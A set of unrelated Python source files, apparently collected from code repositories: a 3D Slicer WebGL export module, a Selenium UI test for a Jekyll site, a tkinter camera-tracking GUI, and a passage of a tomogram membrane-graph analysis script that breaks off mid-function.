class WebGLExportWidget:
def __init__( self, parent=None ):
if not parent:
self.parent = slicer.qMRMLWidget()
self.parent.setLayout( qt.QVBoxLayout() )
self.parent.setMRMLScene( slicer.mrmlScene )
else:
self.parent = parent
self.logic = WebGLExportLogic()
self.__httpd = None
self.__port = 3456
self.__p = None
if not parent:
self.setup()
self.parent.show()
def __del__( self ):
# if we have a httpd server running, kill it
if self.__httpd:
self.__p.terminate()
def setup( self ):
# settings
settingsButton = ctk.ctkCollapsibleButton()
settingsButton.text = "Settings"
settingsButton.collapsed = False
self.parent.layout().addWidget( settingsButton )
settingsLayout = qt.QFormLayout( settingsButton )
self.__dirButton = ctk.ctkDirectoryButton()
settingsLayout.addRow( "Output directory:", self.__dirButton )
self.__viewCheckbox = qt.QCheckBox()
self.__viewCheckbox.setChecked( True )
settingsLayout.addRow( "View after export:", self.__viewCheckbox )
# advanced
advancedButton = ctk.ctkCollapsibleButton()
advancedButton.text = "Advanced"
advancedButton.collapsed = True
self.parent.layout().addWidget( advancedButton )
advancedLayout = qt.QFormLayout( advancedButton )
self.__copyCheckbox = qt.QCheckBox()
self.__copyCheckbox.setChecked( True )
advancedLayout.addRow( "Copy models to output directory:", self.__copyCheckbox )
self.__captionCombobox = qt.QComboBox()
self.__captionCombobox.addItems( ['None', 'Model name', 'Hierarchy name'] )
self.__captionCombobox.currentIndex = 1 # Model name by default
advancedLayout.addRow( "Set captions from:", self.__captionCombobox )
self.__serverCheckbox = qt.QCheckBox()
self.__serverCheckbox.setChecked( useWebserver )
if not useWebserver:
self.__serverCheckbox.setEnabled( False )
advancedLayout.addRow( "Run internal web server:", self.__serverCheckbox )
# Apply button
self.__exportButton = qt.QPushButton( "Export to WebGL" )
self.__exportButton.toolTip = "Export to WebGL using XTK."
self.__exportButton.enabled = True
self.parent.layout().addWidget( self.__exportButton )
# Add vertical spacer
self.parent.layout().addStretch( 1 )
# connections
self.__exportButton.connect( 'clicked()', self.onExport )
def onExport( self ):
"""
Export to the filesystem.
"""
self.__exportButton.text = "Working..."
slicer.app.processEvents()
outputDir = os.path.abspath( self.__dirButton.directory )
outputFile = os.path.join( outputDir, 'index.html' )
try:
output = self.logic.export( self.__captionCombobox.currentIndex, self.__copyCheckbox.checked, outputDir )
except Exception as e:
# maybe the scene was not saved?
qt.QMessageBox.warning( None, 'Error', 'Please make sure the scene was saved before attempting to export to WebGL!' )
self.__exportButton.text = "Export to WebGL"
return
if self.__serverCheckbox.checked and useWebserver:
# start server
os.chdir( outputDir )
# if we already have an httpd running, kill it now;
# it will likely leave an orphaned process, but since we mark it as killed,
# slicer will destroy it on exit
if self.__httpd:
self.__p.terminate()
# increase the port
self.__port += 1
# check first if the port is available (since we open it as a new process we cannot check it later)
portFree = False
while not portFree:
try:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
s.bind( ( "", self.__port ) )
except socket.error, e:
portFree = False
self.__port += 1
finally:
s.close()
portFree = True
# we need to break out of the pythonQt context here to make multiprocessing work
import sys
sys.stdin = sys.__stdin__
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
self.__handler = SimpleHTTPServer.SimpleHTTPRequestHandler
self.__httpd = SocketServer.TCPServer( ( "", self.__port ), self.__handler )
self.__p = m.Process( target=self.__httpd.serve_forever )
self.__p.start()
url = 'http://localhost:' + str( self.__port ) + '/index.html'
else:
# no server
url = outputFile
with open( outputFile, 'w' ) as f:
f.write( output )
self.__exportButton.text = "Export to WebGL"
if self.__viewCheckbox.checked:
time.sleep( 1 )
webbrowser.open_new_tab( url )
class WebGLExportLogic:
"""
The actual export logic.
"""
def __init__( self ):
self.__tree = None
self.__nodes = {}
# the html header
self.__header = """
<html>
<!-- WebGL Export for 3D Slicer4 powered by XTK -- http://goXTK.com -->
<head>
<title>WebGL Export</title>
<script type="text/javascript" src="http://get.goxtk.com/xtk_release_9.js"></script>
<script type="text/javascript">
var run = function() {
%s
"""
# the html footer
self.__footer = """
%s
};
</script>
</head>
<body style="margin:0px; padding:0px;" onload="run()">
%s
</body>
</html>
"""
def configureXrenderers( self ):
"""
Grab some Slicer environment values like the camera position etc. and configure the X.renderers
"""
init = ' ' * 8 + "r%s = new X.renderer3D();" + '\n' + ' ' * 8 + "r%s.container = 'r%s';\n"+ ' ' * 8 + 'r%s.init();' + '\n'
configuredInit = ''
div = ' ' * 8 + '<div id="r%s" style="background-color: %s; width: %s; height: %s;%s"></div>' + '\n'
configuredDiv = ''
render = ' ' * 8 + '%sr%s.add(scene);' + '\n'
render += ' ' * 8 + 'r%s.camera.position = %s;' + '\n'
render += ' ' * 8 + 'r%s.camera.up = %s;' + '\n'
render += ' ' * 8 + 'r%s.render();%s' + '\n\n'
configuredRender = ''
# check the current layout
renderers = []
if slicer.app.layoutManager().layout == 15:
# dual 3d
renderers.append( 0 )
renderers.append( 1 )
elif slicer.app.layoutManager().layout == 19:
# triple 3d
renderers.append( 0 )
renderers.append( 1 )
renderers.append( 2 )
else:
# always take just the main 3d view
renderers.append( 0 )
threeDViews = slicer.app.layoutManager().threeDViewCount
for r in xrange( threeDViews ):
# grab the current 3d view background color
threeDWidget = slicer.app.layoutManager().threeDWidget( r )
threeDView = threeDWidget.threeDView()
if not threeDView.isVisible():
continue
mrmlViewNode = threeDView.mrmlViewNode()
bgColor = threeDView.backgroundColor.name() + ';'
# grab the current camera position and up vector
cameraNodes = slicer.util.getNodes( 'vtkMRMLCamera*' )
cameraNode = None
for c in cameraNodes.items():
cameraNode = c[1]
if cameraNode.GetActiveTag() == mrmlViewNode.GetID():
# found the cameraNode
break
if not cameraNode:
raise Exception( 'Something went terribly wrong..' )
camera = cameraNode.GetCamera()
cameraPosition = str( list(camera.GetPosition()) )
cameraUp = str( list(camera.GetViewUp()) )
width = '100%'
height = '100%'
float = ''
begin = '';
end = '';
if ( len( renderers ) == 2 ):
# dual 3d
width = '49.35%'
if threeDWidget.x == 0:
# this is the left one
float += 'position:absolute;left:0;bottom:0;'
else:
begin = 'r0.onShowtime = function() {'
end = '}'
float += 'position:absolute;right:0;bottom:0;'
elif ( len( renderers ) == 3 ):
height = '49.25%'
# triple 3d
if r != 0:
# this is the second row
width = '49.35%'
if threeDWidget.x == 0:
# this is the left one
begin = ' ' * 8 + 'r0.onShowtime = function() {'
float += 'position:absolute;left:0;bottom:0;'
else:
end = ' ' * 8 + '};'
float += 'position:absolute;right:0;bottom:0;'
configuredInit += init % ( r, r, r, r )
configuredRender += render % ( begin, r, r, cameraPosition, r, cameraUp, r, end )
configuredDiv += div % ( r, bgColor, width, height, float )
# .. and configure the X.renderer
header = self.__header % ( configuredInit )
footer = self.__footer % ( configuredRender, configuredDiv )
return [header, footer]
def export( self, captionMode, copyFiles, outputDir ):
"""
Run through the mrml scene and create an XTK tree based on vtkMRMLModelHierarchyNodes and vtkMRMLModelNodes
"""
scene = slicer.mrmlScene
nodes = scene.GetNumberOfNodes()
self.__nodes = {}
# 1 for model name, 2 for parent name
self.__captionMode = captionMode
# TRUE if we shall copy the files to the outputDir
self.__copyFiles = copyFiles
self.__outputDir = outputDir
self.__tree = Tree()
self.__tree.create_node( "Scene", "scene" )
for n in xrange( nodes ):
node = scene.GetNthNode( n )
self.parseNode( node )
[header, footer] = self.configureXrenderers()
output = header
output += self.createXtree( "scene" )
output += footer
return output
def parseNode( self, node ):
"""
Parse one mrml node if it is a valid vtkMRMLModelNode or vtkMRMLModelHierarchyNode and add it to our tree
"""
if not node:
return
if ( not node.IsA( 'vtkMRMLModelNode' ) and not node.IsA( 'vtkMRMLModelHierarchyNode' ) ) or ( node.IsA( 'vtkMRMLModelNode' ) and node.GetHideFromEditors() ):
return
if self.__nodes.has_key( node.GetID() ):
return
parent_node = "scene"
parentNode = None
hNode = None
if node.IsA( 'vtkMRMLModelNode' ):
parentNode = slicer.app.applicationLogic().GetModelHierarchyLogic().GetModelHierarchyNode( node.GetID() )
if parentNode:
parentNode = parentNode.GetParentNode()
elif node.IsA( 'vtkMRMLModelHierarchyNode' ):
parentNode = node.GetParentNode()
if parentNode:
if parentNode.GetID() == node.GetID():
return
parent_node = parentNode.GetID()
self.parseNode( parentNode )
if not node.IsA( 'vtkMRMLModelHierarchyNode' ) or not node.GetModelNode():
self.__nodes[node.GetID()] = node.GetName()
self.__tree.create_node( node.GetName(), node.GetID(), parent=parent_node )
def createXtree( self, position, level=_ROOT, parent="" ):
"""
Convert the internal tree to XTK code.
"""
queue = self.__tree[position].fpointer
mrmlId = self.__tree[position].identifier
output = ' ' * 8 + mrmlId + ' = new X.mesh();\n'
if not level == _ROOT:
n = slicer.mrmlScene.GetNodeByID( mrmlId )
if n.IsA( 'vtkMRMLModelNode' ):
# grab some properties
s = n.GetStorageNode()
if not s:
# error
raise Exception( 'Scene not saved!' )
file = s.GetFileName()
if not file:
# error
raise Exception( 'Scene not saved!' )
d = n.GetDisplayNode()
color = str( list(d.GetColor()) )
opacity = str( d.GetOpacity() )
visible = str( bool( d.GetVisibility() ) ).lower()
if self.__copyFiles:
fileName = os.path.split( file )[1]
shutil.copy( file, os.path.join( self.__outputDir, fileName ) )
file = fileName
output += ' ' * 8 + mrmlId + '.file = "' + file + '";\n'
output += ' ' * 8 + mrmlId + '.color = ' + color + ';\n'
output += ' ' * 8 + mrmlId + '.opacity = ' + opacity + ';\n'
output += ' ' * 8 + mrmlId + '.visible = ' + visible + ';\n'
if self.__captionMode == 1:
# From Model Name
output += ' ' * 8 + mrmlId + '.caption = "' + n.GetName() + '";\n'
elif self.__captionMode == 2:
# From Parent
parentNode = slicer.util.getNode( parent )
if parentNode:
output += ' ' * 8 + mrmlId + '.caption = "' + parentNode.GetName() + '";\n'
output += ' ' * 8 + parent + '.children.push(' + mrmlId + ');\n\n'
level += 1
for element in queue:
output += self.createXtree( element, level, mrmlId ) # recursive call
return output
class Slicelet( object ):
"""A slicer slicelet is a module widget that comes up in stand alone mode
implemented as a python class.
This class provides common wrapper functionality used by all slicer modlets.
"""
# TODO: put this in a SliceletLib
# TODO: parse command line args
def __init__( self, widgetClass=None ):
self.parent = qt.QFrame()
self.parent.setLayout( qt.QVBoxLayout() )
# TODO: should have way to pop up python interactor
self.buttons = qt.QFrame()
self.buttons.setLayout( qt.QHBoxLayout() )
self.parent.layout().addWidget( self.buttons )
self.addDataButton = qt.QPushButton( "Add Data" )
self.buttons.layout().addWidget( self.addDataButton )
self.addDataButton.connect( "clicked()", slicer.app.ioManager().openAddDataDialog )
self.loadSceneButton = qt.QPushButton( "Load Scene" )
self.buttons.layout().addWidget( self.loadSceneButton )
self.loadSceneButton.connect( "clicked()", slicer.app.ioManager().openLoadSceneDialog )
if widgetClass:
self.widget = widgetClass( self.parent )
self.widget.setup()
self.parent.show()
class WebGLExportSlicelet( Slicelet ):
""" Creates the interface when module is run as a stand alone gui app.
"""
def __init__( self ):
super( WebGLExportSlicelet, self ).__init__( WebGLExportWidget )
if __name__ == "__main__":
# TODO: need a way to access and parse command line arguments
# TODO: ideally command line args should handle --xml
import sys
print( sys.argv )
slicelet = WebGLExportSlicelet()
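# Launch sketch (an assumption, not part of the original module): this __main__
# block is meant to be run with 3D Slicer's bundled Python interpreter (e.g. via
# Slicer's --python-script option) so that the slicer and qt modules used above
# are importable.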
|
ui-tests.py
|
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from webdriver_manager.chrome import ChromeDriverManager
def wait_for(driver, xpath):
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
return WebDriverWait(driver, 20).until(EC.presence_of_element_located((By.XPATH, xpath)))
def wait_visible(driver, xpath):
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
return WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, xpath)))
def iter_stream_lines(stream, timeout=None):
from threading import Thread
from queue import Queue, Empty
def enqueue_output(out, queue):
for line in out:
queue.put(line)
out.close()
q = Queue()
t = Thread(target=enqueue_output, args=(stream, q))
t.daemon = True # thread dies with the program
t.start()
# read line without blocking
if timeout is None:
get = lambda: q.get_nowait()
else:
get = lambda: q.get(timeout=timeout)
while True:
try: line = get()
except Empty:
yield None
else: # got line
yield line
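# Note: with a finite timeout the generator above yields None whenever the queue
# is empty, which lets run_server() below keep scanning the subprocess output
# line by line without blocking indefinitely.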
def run_server():
import subprocess
import sys
ON_POSIX = 'posix' in sys.builtin_module_names
cmd = f"cmd /c bundle exec jekyll serve --port 9875 --host 0.0.0.0"
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=ON_POSIX,
universal_newlines=True,
)
import re
re_addr = re.compile(r"^\s*Server address: (.*)\s*$")
re_running = re.compile(r"\bServer running\b")
running = False
addr = None
for line in iter_stream_lines(proc.stdout, timeout=1):
if line is not None:
sys.stdout.write(line)
match = re_addr.fullmatch(line)
if match is not None:
addr = match[1]
if re_running.search(line) is not None:
running = True
if addr is not None and running == True:
break
addr = addr.replace("0.0.0.0", "localhost")
return addr
def set_viewport_size(driver, width, height):
# ref: https://stackoverflow.com/questions/37181403/how-to-set-browser-viewport-size
window_size = driver.execute_script("""
return [window.outerWidth - window.innerWidth + arguments[0],
window.outerHeight - window.innerHeight + arguments[1]];
""", width, height)
driver.set_window_size(*window_size)
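# Usage sketch (values are illustrative only): emulate a fixed CSS viewport,
# independent of the browser chrome, before loading a page:
#     set_viewport_size(driver, 360, 640)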
class TestInfo(object):
def __init__(self) -> None:
super().__init__()
self.address = run_server()
self.browser = webdriver.Chrome(
executable_path=ChromeDriverManager().install(),
)
html = ""
with open("ui-test.html", "r") as fp:
html = fp.read()
self.browser.execute_script("""
((html) =>
{
document.open('text/html')
document.write(html)
document.close()
})
.apply(null, arguments)
""", html)
def test_portrait(self):
# ref: https://deviceatlas.com/blog/most-used-smartphone-screen-resolutions
self.browser.maximize_window()
wait_for(self.browser, r'//*[@id="TEST_FRAME"]')
self.browser.execute_script(f"""
(() =>
{{
var iframe = document.getElementById('TEST_FRAME')
iframe.style.width = "{1080/3}px"
iframe.style.height = "{1920/3}px"
iframe.src = "{self.address}"
}})
.apply(null, arguments)
""")
def do_test(self, path):
iframe = wait_for(self.browser, r'//*[@id="TEST_FRAME"]')
self.browser.execute_script(f"""
(() =>
{{
var iframe = document.getElementById('TEST_FRAME')
iframe.src = "{self.address}/{path}"
}})
.apply(null, arguments)
""")
self.browser.switch_to.frame(iframe)
# TODO: do automated tests
self.browser.switch_to.parent_frame()
command = None
while command is None:
try:
command = wait_visible(self.browser, r'//*[@id="COMMAND"]')
except TimeoutException:
pass
value = command.get_attribute("data-value")
self.browser.execute_script(f"""
(() =>
{{
var command = document.getElementById('COMMAND')
command.style.display = "none"
}})
.apply(null, arguments)
""")
return value
def do_tests():
t = TestInfo()
tests = [
{"path": "postgresql/connect-to-database-via-cli", "accepted": False},
{"path": "postgresql/drop-table-if-exists", "accepted": False},
]
for test_item in tests:
while True:
t.test_portrait()
action = t.do_test(test_item["path"])
if action == "ACCEPT":
test_item["accepted"] == True
break
if action == "REJECT":
break
return None
def main():
do_tests()
if __name__ == "__main__":
main()
|
applicationv2.py
|
import tkinter
from tkinter import *
import tkinter.messagebox  # explicit import needed for tkinter.messagebox.showinfo used below
import matplotlib.pyplot as plt
import cvlib as cv
from cvlib.object_detection import draw_bbox
from motorisedcameratracking import *
import threading
import sys
import time
import cv2
from PIL import Image, ImageTk
import webbrowser
import json
def calibrate():
if not x.isRunning():
global saveData#creates the global variables
global saveDataLoaded
#with open("saveFile.json", "r") as saveFile:
# saveData = json.load(saveFile)
#saveDataLoaded=True
waitTime=0.0012#sets the wait time to be used in calibration
speed1,speed2=x.calibrateZero(waitTime,360)#calibrates the motors
saveData['motors']['xMotor']['minWaitTime']=waitTime#assigns the results of calibration to the dictionary
saveData['motors']['yMotor']['minWaitTime']=waitTime
saveData['motors']['xMotor']['maxSpeed']=speed1
saveData['motors']['yMotor']['maxSpeed']=speed2
x.setSpecsZero(waitTime=saveData['motors']['xMotor']['minWaitTime'],speed1=saveData['motors']['xMotor']['maxSpeed'],speed2=None)#sets the specs for the motors to run on
else:
tkinter.messagebox.showinfo("warning","this can not be run while the tracking is active")#warns the user they are already tracking
def importCalibration():
global saveData#tells it to reference the global variables
global saveDataLoaded
with open("saveFile.json", "r") as saveFile:#opens the json file
saveData = json.load(saveFile)#loads the data
saveDataLoaded=True#sets data loaded to true
x.setSpecsZero(waitTime=saveData['motors']['xMotor']['minWaitTime'],speed1=saveData['motors']['xMotor']['maxSpeed'],speed2=saveData['motors']['xMotor']['maxSpeed'])#sets the specs for the motors to run on
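# Expected saveFile.json layout (inferred from the keys read and written above;
# the numeric values are placeholders only):
# {"motors": {"xMotor": {"minWaitTime": 0.0012, "maxSpeed": 0.0},
#             "yMotor": {"minWaitTime": 0.0012, "maxSpeed": 0.0}}}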
def saveCalibration():
if saveDataLoaded:
print(saveData)
with open("saveFile.json", "w") as saveFile:#opens the file
json.dump(saveData, saveFile)#saves the data
else:
tkinter.messagebox.showinfo("warning","There is no calibration data to save")#does not save if there is no data to save
def setCalibration():
pass
def disableAimButtons():
"""disables the buttons when the tracking is active to prevent an error being raised"""
upAdjust.config(state=DISABLED)
downAdjust.config(state=DISABLED)
leftAdjust.config(state=DISABLED)
rightAdjust.config(state=DISABLED)
def activateAimButtons():
"""renables buttons when tracking is stopped"""
upAdjust.config(state=NORMAL)
downAdjust.config(state=NORMAL)
leftAdjust.config(state=NORMAL)
rightAdjust.config(state=NORMAL)
def exit():
"""the method which is run when the exit button is pressed"""
if x.isRunning():#checks if the tracking is active
x.terminate()#stops the tracking
window.destroy()#destroys the window
sys.exit()#ends the program
def imageDisplayA():
while True:#loops as is run in a thread
time.sleep(2)#checks if an image is available every 2 seconds
if x.isImageAvailable():
image=x.getFrameAsImage([1000,500])#gets the image with the boxes pre drawn etc
#b,g,r = cv2.split(image)#coverts the image to the format required by tkinter
#img = cv2.merge((r,g,b))
#img = Image.fromarray(img)
#img = ImageTk.PhotoImage(image=img)
img=convertImageTkinter(image)
imageDisplay.config(image=img)#configures the label to show the image
def startTracking():
if not x.isRunning():#checks the tracking is not already active
popUp=tkinter.Tk()#creates a new window to start the tracking
popUp.title('start Tracking')
popUp.geometry("200x200")
targets=x.getSupportedTargets()
default = tkinter.StringVar(popUp)
default.set(targets[0])#default value
targetSelector = OptionMenu(popUp, default, *targets)#creates a drop down menu to let the user select the target
targetSelector.pack()
def track():
disableAimButtons()#disables the aiming buttons
x.track(default.get())#starts tracking
imageDisplayThread=threading.Thread(target=imageDisplayA)#starts the thread to display the images
imageDisplayThread.start()
popUp.destroy()#destroys the window
button = tkinter.Button(popUp, text="startTracking", command=track)#adds the button to start tracking
button.pack()
popUp.mainloop()
else:
tkinter.messagebox.showinfo("warning","tracking is already active")#warns the user they are already tracking
def startTrackingLimited():
if not x.isRunning():
popUp=tkinter.Tk()#creates a window to start tracking
popUp.title('start Tracking')
popUp.geometry("300x200")
targets=x.getSupportedTargets()
default = tkinter.StringVar(popUp)
default.set(targets[0]) # default value
targetSelector = OptionMenu(popUp, default, *targets)#creates drop down menu
targetSelector.grid(row=1,column=2)
#creates labels and input boxes
a=Label(popUp,text='first x limit')
b=Label(popUp,text='second x limit')
c=Label(popUp,text='first y limit')
d=Label(popUp,text='second y limit')
a.grid(row=2,column=1)#uses grid to align the items
b.grid(row=3,column=1)
c.grid(row=4,column=1)
d.grid(row=5,column=1)
xl1=tkinter.Entry(popUp)
xl2=tkinter.Entry(popUp)
yl1=tkinter.Entry(popUp)
yl2=tkinter.Entry(popUp)
xl1.grid(row=2,column=2)
xl2.grid(row=3,column=2)
yl1.grid(row=4,column=2)
yl2.grid(row=5,column=2)
warningLabel=tkinter.Label(popUp)
warningLabel.grid(row=6,column=2)
def track():
xLimit1=float(xl1.get())#gets the str from the boxes and converts it to a float
xLimit2=float(xl2.get())
yLimit1=float(yl1.get())
yLimit2=float(yl2.get())
if xLimit1<0 and xLimit2>0 and yLimit1<0 and yLimit2>0:#if limits are in correct format it starts tracking
startTracking(xLimit1,xLimit2,yLimit1,yLimit2)
else:
warningLabel.config(text='please enter correct limits')#warns the user incorrect limits have been used.
def startTracking(xLimit1,xLimit2,yLimit1,yLimit2):#starts tracking with the correct limits
disableAimButtons()
x.trackLimited(default.get(),xLimit1,xLimit2,yLimit1,yLimit2)
imageDisplayThread=threading.Thread(target=imageDisplayA)#starts the thread to display the image
imageDisplayThread.start()
popUp.destroy()#destroys the window
button = tkinter.Button(popUp, text="startTracking", command=track)
button.grid(row=7,column=2)
else:
tkinter.messagebox.showinfo("warning","tracking is already active")#warns the user they are already tracking
def stopTracking():
if x.isRunning():#checks if the motor is running
x.terminate()#ends the tracking
activateAimButtons()#reactivates the aiming buttons
else:
tkinter.messagebox.showinfo("warning","nothing to stop")#warns the user there is nothing to stop
def startUp():
importCalibration()#imports the calibration details
def help():
webbrowser.open('https://github.com/wDove1/motorisedcameratracking')#opens the github repository
def showVersionDetails():
pass
saveData=None
saveDataLoaded=False
x=MotorisedCameraTracking(camera={'name': 'RPICam','orientation': 180,'Width':3000,'Height':2000},config={'imagingMode':'intermediate'})#creates an object for the motor tracking
#x.setWarnings(False)
x.setGUIFeatures(True)
startUp()#calls the startup function
window=tkinter.Tk()#creates the main window
window.title('motorisedcameratracking')#titles the window
window.protocol("WM_DELETE_WINDOW", exit)#assigns the exit button to the exit function which also terminates the processes
window.geometry("1920x1080")#sets the size of the window
menuBar=Menu(window)#creates the menu
#assigns drop down menus and buttons to the menu
trackingMenu=Menu(menuBar,tearoff=0)
trackingMenu.add_command(label='startTracking',command=startTracking)
trackingMenu.add_command(label='startTrackingLimited',command=startTrackingLimited)
trackingMenu.add_command(label='stop',command=stopTracking)
helpMenu=Menu(menuBar,tearoff=0)
helpMenu.add_command(label='help',command=help)
calibrationMenu=Menu(menuBar,tearoff=0)
calibrationMenu.add_command(label='motorCalibration',command=calibrate)
calibrationMenu.add_command(label='saveCalibration',command=saveCalibration)
calibrationMenu.add_command(label='importCalibration',command=importCalibration)
#calibrationMenu.add_command(label='setCalibration',command=setCalibration)
menuBar.add_cascade(label='Tracking',menu=trackingMenu)#adds drop down menus to the main menu
menuBar.add_cascade(label='Help',menu=helpMenu)
menuBar.add_cascade(label='Calibration',menu=calibrationMenu)
window.config(menu=menuBar)
upAdjust=tkinter.Button(window,text='Motor Up',command=lambda: x.aim(5,"y"))#creates the aiming buttons
downAdjust=tkinter.Button(window,text='Motor Down',command=lambda: x.aim(-5,"y"))
leftAdjust=tkinter.Button(window,text='Motor Left',command=lambda: x.aim(-5,"x"))
rightAdjust=tkinter.Button(window,text='Motor Right',command=lambda: x.aim(5,"x"))
upAdjust.grid(row = 0, column = 0, pady = 5)#assigns the buttons to the window
downAdjust.grid(row = 1, column = 0, pady = 5)
leftAdjust.grid(row = 2, column = 0, pady = 5)
rightAdjust.grid(row = 3, column = 0, pady = 5)
imageDisplay=tkinter.Label(window,text='no image to display')#creates the label for displaying the image
imageDisplay.grid(row=4,column=8,pady=100,padx=100)
window.mainloop()#starts the window
|
dmb_graph_mp.py
|
"""
Script for extracting and analyzing a SynGraphMCF from an oriented pair of membranes (like a synapse)
Input: - A STAR file with a list of (sub-)tomograms to process:
+ Density map tomogram
+ Segmentation tomogram
- Graph input parameters
Output: - A STAR file with the (sub-)tomograms and their corresponding graphs
(MbGraphMCF object)
- Additional files for visualization
"""
__author__ = 'Antonio Martinez-Sanchez'
# ################ Package import
import time
import sys
import math
import pyseg as ps
import scipy as sp
import os
import numpy as np
import multiprocessing as mp
import pickle
########## Global variables
MB_LBL_1, MB_LBL_2 = 1, 2
EXT_LBL_1, EXT_LBL_2 = 3, 4
GAP_LBL, BG_LBL = 5, 0
########################################################################################
# INPUT PARAMETERS
########################################################################################
####### Input data
ROOT_PATH = '/fs/pool/pool-ruben/antonio/nuc_mito' # Data path
# Input STAR file with segmentations
in_star = ROOT_PATH + '/pre/mbdo_nosplit/dmb_seg_oriented_pre.star'
npr = 1 # number of parallel processes
####### Output data
output_dir = ROOT_PATH + '/graphs/v2'
####### GraphMCF parameters
res = 1.408 # nm/pix
s_sig = 0.75 # 1.5
v_den = 0.0035 # 0.007 # 0.0025 # nm^3
ve_ratio = 2 # 4
max_len = 10 # 15 # 30 # nm
####### Advanced parameters
# nsig = 0.01
csig = 0.01
ang_rot = None
ang_tilt = None
nstd = 5 # 3 # 10
smooth = 3
mb_dst_off = 5 # nm
DILATE_NITER = 2 # pix
do_clahe = False # True
####### Graph density thresholds
v_prop = None # ps.globals.STR_FIELD_VALUE # In None topological simplification
e_prop = ps.globals.STR_FIELD_VALUE # ps.globals.STR_FIELD_VALUE_EQ # ps.globals.STR_VERT_DST
v_mode = None # 'low'
e_mode = 'low'
prop_topo = ps.globals.STR_FIELD_VALUE # ps.globals.STR_FIELD_VALUE_EQ # None is ps.globals.STR_FIELD_VALUE
########################################################################################
# MAIN ROUTINE
########################################################################################
# Print initial message
print('Extracting GraphMCF and NetFilament objects from tomograms')
print('\tAuthor: ' + __author__)
print('\tDate: ' + time.strftime("%c") + '\n')
print('Options:')
# print '\tDisPerSe persistence threshold (nsig): ' + str(nsig)
print('\tSTAR file with the segmentations: ' + str(in_star))
print('\tNumber of parallel processes: ' + str(npr))
print('\tDisPerSe persistence threshold (csig): ' + str(csig))
if ang_rot is not None:
print('Missing wedge edge compensation (rot, tilt): (' + str(ang_rot) + ', ' + str(ang_tilt) + ')')
print('\tSigma for gaussian pre-processing: ' + str(s_sig))
print('\tSigma for contrast enhancement: ' + str(nstd))
print('\tSkeleton smoothing factor: ' + str(smooth))
print('\tData resolution: ' + str(res) + ' nm/pixel')
print('\tMask offset: ' + str(mb_dst_off) + ' nm')
print('\tOutput directory: ' + output_dir)
print('Graph density thresholds:')
if v_prop is None:
print('\tTarget vertex density (membrane) ' + str(v_den) + ' vertex/nm^3 for topological simplification')
else:
print('\tTarget vertex density (membrane) ' + str(
v_den) + ' vertex/nm^3 for property ' + v_prop + ' with mode ' + v_mode)
print('\tTarget edge/vertex ratio (non membrane) ' + str(ve_ratio) + ' for property ' + e_prop + ' with mode ' + e_mode)
if do_clahe:
print('\t-Computing CLAHE.')
print('')
print('Parsing input star file...')
star = ps.sub.Star()
star.load(in_star)
in_seg_l = star.get_column_data('_psSegImage')
in_tomo_l = star.get_column_data('_rlnImageName')
star.add_column('_psGhMCFPickle')
### Parallel worker
def pr_worker(pr_id, ids, q_pkls):
pkls_dic = dict()
for row in ids:
input_seg, input_tomo = in_seg_l[row], in_tomo_l[row]
print('\tP[' + str(pr_id) + '] Sub-volume to process found: ' + input_tomo)
print('\tP[' + str(pr_id) + '] Computing paths for ' + input_tomo + ' ...')
path, stem_tomo = os.path.split(input_tomo)
stem_pkl, _ = os.path.splitext(stem_tomo)
input_file = output_dir + '/' + stem_pkl + '_g' + str(s_sig) + '.fits'
_, stem = os.path.split(input_file)
stem, _ = os.path.splitext(stem)
print('\tP[' + str(pr_id) + '] Loading input data: ' + stem_tomo)
tomo = ps.disperse_io.load_tomo(input_tomo).astype(np.float32)
seg = ps.disperse_io.load_tomo(input_seg)
print('\tP[' + str(pr_id) + '] Computing masks and segmentation tomograms...')
tomoh = np.zeros(shape=seg.shape, dtype=bool)
mb_dst_off_v = int(math.ceil(mb_dst_off * res))
tomoh[mb_dst_off_v:-mb_dst_off_v, mb_dst_off_v:-mb_dst_off_v, mb_dst_off_v:-mb_dst_off_v] = True
mask = ((tomoh & (seg != BG_LBL)) == False).astype(float)
input_msk = output_dir + '/' + stem_pkl + '_mask.fits'
ps.disperse_io.save_numpy(mask.transpose(), input_msk)
mask = mask == False
mask_den = ((seg == MB_LBL_1) | (seg == MB_LBL_2)) & mask
print('\tP[' + str(pr_id) + '] Smoothing input tomogram (s=' + str(s_sig) + ')...')
density = sp.ndimage.filters.gaussian_filter(tomo, s_sig)
density = ps.globals.cont_en_std(density, nstd=nstd, lb=0, ub=1, mask=mask)
ps.disperse_io.save_numpy(tomo, output_dir + '/' + stem_pkl + '.vti')
ps.disperse_io.save_numpy(density.transpose(), input_file)
ps.disperse_io.save_numpy(density, output_dir + '/' + stem + '.vti')
print('\tP[' + str(pr_id) + '] Initializing DisPerSe...')
work_dir = output_dir + '/disperse_pr_' + str(pr_id)
disperse = ps.disperse_io.DisPerSe(input_file, work_dir)
try:
disperse.clean_work_dir()
# except ps.pexceptions.PySegInputWarning as e:
# print e.get_message()
except Warning:
print('\tP[' + str(pr_id) + '] WARNING: could not clean the DisPerSe working directory')
# Manifolds for descending fields with the inverted image
disperse.set_manifolds('J0a')
# Down skeleton
disperse.set_dump_arcs(-1)
# disperse.set_nsig_cut(nsig)
rcut = round(density[mask_den].std() * csig, 4)
print('\tP[' + str(pr_id) + '] Persistence cut threshold set to: ' + str(rcut) + ' grey level')
disperse.set_cut(rcut)
disperse.set_mask(input_msk)
disperse.set_smooth(smooth)
print('\tP[' + str(pr_id) + '] Running DisPerSe...')
disperse.mse(no_cut=False, inv=False)
skel = disperse.get_skel()
manifolds = disperse.get_manifolds(no_cut=False, inv=False)
# Build the GraphMCF for the membrane
print('\tP[' + str(pr_id) + '] Building MCF graph for a pair of oriented membranes...')
# graph = ps.mb.MbGraphMCF(skel, manifolds, density, seg)
graph = ps.mb.SynGraphMCF(skel, manifolds, density, seg)
graph.set_resolution(res)
graph.build_from_skel(basic_props=False)
graph.filter_self_edges()
graph.filter_repeated_edges()
print('\tP[' + str(pr_id) + '] Filtering nodes close to mask border...')
